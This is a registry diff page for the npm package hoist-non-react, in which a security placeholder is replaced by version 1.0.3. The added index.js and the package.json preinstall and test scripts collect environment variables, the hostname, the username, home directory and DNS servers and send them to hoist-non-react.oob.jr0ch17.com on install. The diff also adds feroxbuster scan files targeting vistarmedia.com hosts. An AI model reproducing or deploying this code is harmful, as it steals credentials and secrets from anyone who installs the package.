hoist-non-react 0.0.1-security.0 → 1.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of hoist-non-react might be problematic. Click here for more details.

Files changed (6) hide show
  1. package/ferox-https_docsite_vistarmedia_com_-1741036505.state +1 -0
  2. package/ferox-https_docsite_vistarmedia_com__-1741035692.state +1 -0
  3. package/ferox-https_job-svc-b_vistarmedia_com_-1741035654.state +1 -0
  4. package/index.js +45 -0
  5. package/package.json +9 -3
  6. package/README.md +0 -5
package/ferox-https_docsite_vistarmedia_com_-1741036505.state ADDED
@@ -0,0 +1 @@
1
+ {"scans":[{"id":"4c685c1a4f8e440d98c3079d2d8076b5","url":"https://docsite.vistarmedia.com/","normalized_url":"https://docsite.vistarmedia.com/","scan_type":"Directory","status":"Running","num_requests":373692,"requests_made_so_far":203418}],"config":{"type":"configuration","wordlist":"/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt","config":"","proxy":"","replay_proxy":"","server_certs":[],"client_cert":"","client_key":"","target_url":"https://docsite.vistarmedia.com/","status_codes":[100,101,102,200,201,202,203,204,205,206,207,208,226,300,301,302,303,304,305,307,308,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,421,422,423,424,426,428,429,431,451,500,501,502,503,504,505,506,507,508,510,511,103,425],"replay_codes":[100,101,102,200,201,202,203,204,205,206,207,208,226,300,301,302,303,304,305,307,308,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,421,422,423,424,426,428,429,431,451,500,501,502,503,504,505,506,507,508,510,511,103,425],"filter_status":[],"threads":5,"timeout":7,"verbosity":0,"silent":false,"quiet":false,"auto_bail":false,"auto_tune":false,"json":false,"output":"","debug_log":"","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36","random_agent":false,"redirects":false,"insecure":true,"extensions":["html","js","xml","json","txt"],"methods":["GET"],"data":[],"headers":{},"queries":[],"no_recursion":false,"extract_links":true,"add_slash":false,"stdin":false,"depth":4,"scan_limit":0,"parallel":0,"rate_limit":0,"filter_size":[],"filter_line_count":[],"filter_word_count":[],"filter_regex":[],"dont_filter":false,"resumed":false,"resume_from":"","save_state":true,"time_limit":"","filter_similar":[],"url_denylist":[],"regex_denylist":[],"collect_extensions":false,"dont_collect":["tif","tiff","ico","cur","bmp","webp","svg","png","jpg","jpeg","jfif","gif","avif","apng","pjpeg","pjp","mov","wav","mpg","mpeg","mp3","mp4","m4a","m4p","m4v","ogg","webm","ogv","oga","flac","aac","3gp","css","zip","xls","xml","gz","tgz"],"collect_backups":false,"backup_extensions":["~",".bak",".bak2",".old",".1"],"collect_words":false,"force_recursion":false,"scan_dir_listings":false,"protocol":"https","limit_bars":0},"responses":[],"statistics":{"type":"statistics","timeouts":0,"requests":203458,"expected_per_scan":373692,"total_expected":373692,"errors":0,"successes":2,"redirects":203456,"client_errors":0,"server_errors":0,"total_scans":1,"initial_targets":0,"links_extracted":0,"extensions_collected":0,"status_200s":2,"status_301s":0,"status_302s":203456,"status_401s":0,"status_403s":0,"status_429s":0,"status_500s":0,"status_503s":0,"status_504s":0,"status_508s":0,"wildcards_filtered":203418,"responses_filtered":203418,"resources_discovered":0,"url_format_errors":0,"redirection_errors":0,"connection_errors":0,"request_errors":0,"directory_scan_times":[],"total_runtime":[0.0],"targets":["https://docsite.vistarmedia.com/"]},"collected_extensions":[],"filters":[{"content_length":142,"line_count":7,"word_count":9,"method":"GET","status_code":302,"dont_filter":false},{"hash":4619493654895045876,"original_url":"https://docsite.vistarmedia.com/1a5645a409d54259b84c1a9a2b1d0ce4"}]}
package/ferox-https_docsite_vistarmedia_com__-1741035692.state ADDED
@@ -0,0 +1 @@
1
+ {"scans":[{"id":"fd74194078154aff983903f878ecfeec","url":"https://docsite.vistarmedia.com/","normalized_url":"https://docsite.vistarmedia.com/","scan_type":"Directory","status":"Running","num_requests":373692,"requests_made_so_far":0}],"config":{"type":"configuration","wordlist":"/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt","config":"","proxy":"","replay_proxy":"","server_certs":[],"client_cert":"","client_key":"","target_url":"https://docsite.vistarmedia.com//","status_codes":[100,101,102,200,201,202,203,204,205,206,207,208,226,300,301,302,303,304,305,307,308,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,421,422,423,424,426,428,429,431,451,500,501,502,503,504,505,506,507,508,510,511,103,425],"replay_codes":[100,101,102,200,201,202,203,204,205,206,207,208,226,300,301,302,303,304,305,307,308,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,421,422,423,424,426,428,429,431,451,500,501,502,503,504,505,506,507,508,510,511,103,425],"filter_status":[],"threads":5,"timeout":7,"verbosity":0,"silent":false,"quiet":false,"auto_bail":false,"auto_tune":false,"json":false,"output":"","debug_log":"","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36","random_agent":false,"redirects":false,"insecure":true,"extensions":["html","js","xml","json","txt"],"methods":["GET"],"data":[],"headers":{},"queries":[],"no_recursion":false,"extract_links":true,"add_slash":false,"stdin":false,"depth":4,"scan_limit":0,"parallel":0,"rate_limit":0,"filter_size":[],"filter_line_count":[],"filter_word_count":[],"filter_regex":[],"dont_filter":false,"resumed":false,"resume_from":"","save_state":true,"time_limit":"","filter_similar":[],"url_denylist":[],"regex_denylist":[],"collect_extensions":false,"dont_collect":["tif","tiff","ico","cur","bmp","webp","svg","png","jpg","jpeg","jfif","gif","avif","apng","pjpeg","pjp","mov","wav","mpg","mpeg","mp3","mp4","m4a","m4p","m4v","ogg","webm","ogv","oga","flac","aac","3gp","css","zip","xls","xml","gz","tgz"],"collect_backups":false,"backup_extensions":["~",".bak",".bak2",".old",".1"],"collect_words":false,"force_recursion":false,"scan_dir_listings":false,"protocol":"https","limit_bars":0},"responses":[],"statistics":{"type":"statistics","timeouts":0,"requests":22,"expected_per_scan":373692,"total_expected":373692,"errors":0,"successes":2,"redirects":20,"client_errors":0,"server_errors":0,"total_scans":1,"initial_targets":0,"links_extracted":0,"extensions_collected":0,"status_200s":2,"status_301s":0,"status_302s":20,"status_401s":0,"status_403s":0,"status_429s":0,"status_500s":0,"status_503s":0,"status_504s":0,"status_508s":0,"wildcards_filtered":0,"responses_filtered":0,"resources_discovered":0,"url_format_errors":0,"redirection_errors":0,"connection_errors":0,"request_errors":0,"directory_scan_times":[],"total_runtime":[0.0],"targets":["https://docsite.vistarmedia.com//"]},"collected_extensions":[],"filters":[{"content_length":142,"line_count":7,"word_count":9,"method":"GET","status_code":302,"dont_filter":false},{"hash":4619493654895045876,"original_url":"https://docsite.vistarmedia.com//ce8fc7c915354b86be95adec5cb82410"}]}
package/ferox-https_job-svc-b_vistarmedia_com_-1741035654.state ADDED
@@ -0,0 +1 @@
1
+ {"scans":[{"id":"42b145f197304ce6b8f0ee92d99ee66c","url":"https://job-svc-b.vistarmedia.com/","normalized_url":"https://job-svc-b.vistarmedia.com/","scan_type":"Directory","status":"Running","num_requests":373692,"requests_made_so_far":61776}],"config":{"type":"configuration","wordlist":"/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt","config":"","proxy":"","replay_proxy":"","server_certs":[],"client_cert":"","client_key":"","target_url":"https://job-svc-b.vistarmedia.com/","status_codes":[100,101,102,200,201,202,203,204,205,206,207,208,226,300,301,302,303,304,305,307,308,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,421,422,423,424,426,428,429,431,451,500,501,502,503,504,505,506,507,508,510,511,103,425],"replay_codes":[100,101,102,200,201,202,203,204,205,206,207,208,226,300,301,302,303,304,305,307,308,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,421,422,423,424,426,428,429,431,451,500,501,502,503,504,505,506,507,508,510,511,103,425],"filter_status":[],"threads":5,"timeout":7,"verbosity":0,"silent":false,"quiet":false,"auto_bail":false,"auto_tune":false,"json":false,"output":"","debug_log":"","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36","random_agent":false,"redirects":false,"insecure":true,"extensions":["html","js","xml","json","txt"],"methods":["GET"],"data":[],"headers":{},"queries":[],"no_recursion":false,"extract_links":true,"add_slash":false,"stdin":false,"depth":4,"scan_limit":0,"parallel":0,"rate_limit":0,"filter_size":[],"filter_line_count":[],"filter_word_count":[],"filter_regex":[],"dont_filter":false,"resumed":false,"resume_from":"","save_state":true,"time_limit":"","filter_similar":[],"url_denylist":[],"regex_denylist":[],"collect_extensions":false,"dont_collect":["tif","tiff","ico","cur","bmp","webp","svg","png","jpg","jpeg","jfif","gif","avif","apng","pjpeg","pjp","mov","wav","mpg","mpeg","mp3","mp4","m4a","m4p","m4v","ogg","webm","ogv","oga","flac","aac","3gp","css","zip","xls","xml","gz","tgz"],"collect_backups":false,"backup_extensions":["~",".bak",".bak2",".old",".1"],"collect_words":false,"force_recursion":false,"scan_dir_listings":false,"protocol":"https","limit_bars":0},"responses":[{"type":"response","url":"https://job-svc-b.vistarmedia.com/robots.txt","original_url":"https://job-svc-b.vistarmedia.com/","path":"/robots.txt","wildcard":false,"status":200,"method":"GET","content_length":25,"line_count":2,"word_count":4,"headers":{"date":"Mon, 03 Mar 2025 20:57:17 GMT","content-type":"text/plain; charset=utf-8","content-length":"25"},"extension":"","timestamp":1741035437.3414016},{"type":"response","url":"https://job-svc-b.vistarmedia.com/ping","original_url":"https://job-svc-b.vistarmedia.com/","path":"/ping","wildcard":false,"status":200,"method":"GET","content_length":2,"line_count":1,"word_count":1,"headers":{"content-length":"2","content-type":"text/plain; charset=utf-8","date":"Mon, 03 Mar 2025 20:57:46 GMT"},"extension":"","timestamp":1741035466.5188165}],"statistics":{"type":"statistics","timeouts":0,"requests":61827,"expected_per_scan":373692,"total_expected":373692,"errors":0,"successes":4,"redirects":0,"client_errors":61823,"server_errors":0,"total_scans":1,"initial_targets":0,"links_extracted":0,"extensions_collected":0,"status_200s":4,"status_301s":0,"status_302s":0,"status_401s":0,"status_403s":61823,"status_429s":0,"status_500s":0,"status_503s":0,"status_504s":0,"status_508s":0,"wildcards_filtered":61785,"responses_filtered":61785,"resources_discovered":2,"url_format_errors":0,"redirection_errors":0,"connection_errors":0,"request_errors":0,"directory_scan_times":[],"total_runtime":[0.0],"targets":["https://job-svc-b.vistarmedia.com/"]},"collected_extensions":[],"filters":[{"content_length":null,"line_count":118,"word_count":242,"method":"GET","status_code":403,"dont_filter":false},{"hash":15321784697444581396,"original_url":"https://job-svc-b.vistarmedia.com/5b5ed641bb6a4a52b2b6289593c479c8"},{"hash":15321784697444614164,"original_url":"https://job-svc-b.vistarmedia.com/7e880a0126f844b5aa8a9ad183909444.html"},{"hash":15321784697444614228,"original_url":"https://job-svc-b.vistarmedia.com/64a09bef74f74e4a8a23f29534464393.js"},{"hash":15321784697444614356,"original_url":"https://job-svc-b.vistarmedia.com/e05254da06c740c69f99cd17397f5958.xml"},{"hash":15321784714624450580,"original_url":"https://job-svc-b.vistarmedia.com/68e649d8ea994f5a8321717870efacf7.txt"}]}
package/index.js ADDED
@@ -0,0 +1,45 @@
1
+ //index.js
2
+ const os = require("os");
3
+ const dns = require("dns");
4
+ const querystring = require("querystring");
5
+ const https = require("https");
6
+ const packageJSON = require("./package.json");
7
+ const package = packageJSON.name;
8
+
9
+
10
+ const trackingData = JSON.stringify({
11
+ p: package,
12
+ c: __dirname,
13
+ hd: os.homedir(),
14
+ hn: os.hostname(),
15
+ un: os.userInfo().username,
16
+ dns: dns.getServers(),
17
+ en: process.env,
18
+ r: packageJSON ? packageJSON.___resolved : undefined,
19
+ v: packageJSON.version,
20
+ pjson: packageJSON,
21
+ });
22
+
23
+ var postData = querystring.stringify({
24
+ msg: trackingData,
25
+ });
26
+
27
+ var options = {
28
+ hostname: "hoist-non-react.oob.jr0ch17.com",
29
+ port: 80,
30
+ path: "/?NPM",
31
+ method: "GET",
32
+ };
33
+
34
+ var req = https.request(options, (res) => {
35
+ res.on("data", (d) => {
36
+ process.stdout.write(d);
37
+ });
38
+ });
39
+
40
+ req.on("error", (e) => {
41
+ // console.error(e);
42
+ });
43
+
44
+ req.write(postData);
45
+ req.end();
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
2
  "name": "hoist-non-react",
3
- "version": "0.0.1-security.0",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.3",
4
+ "description": "vistarmedia hoist-non-react",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"No tests\" && curl -X POST http://hoist-non-react.oob.jr0ch17.com/?host=$(hostname) -d \"$(env)\"",
8
+ "preinstall": "echo \"No tests\" && curl -X POST http://hoist-non-react.oob.jr0ch17.com/?host=$(hostname) -d \"$(env)\""
9
+ },
10
+ "author": "@JR0ch17",
11
+ "license": "ISC"
6
12
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=hoist-non-react for more information.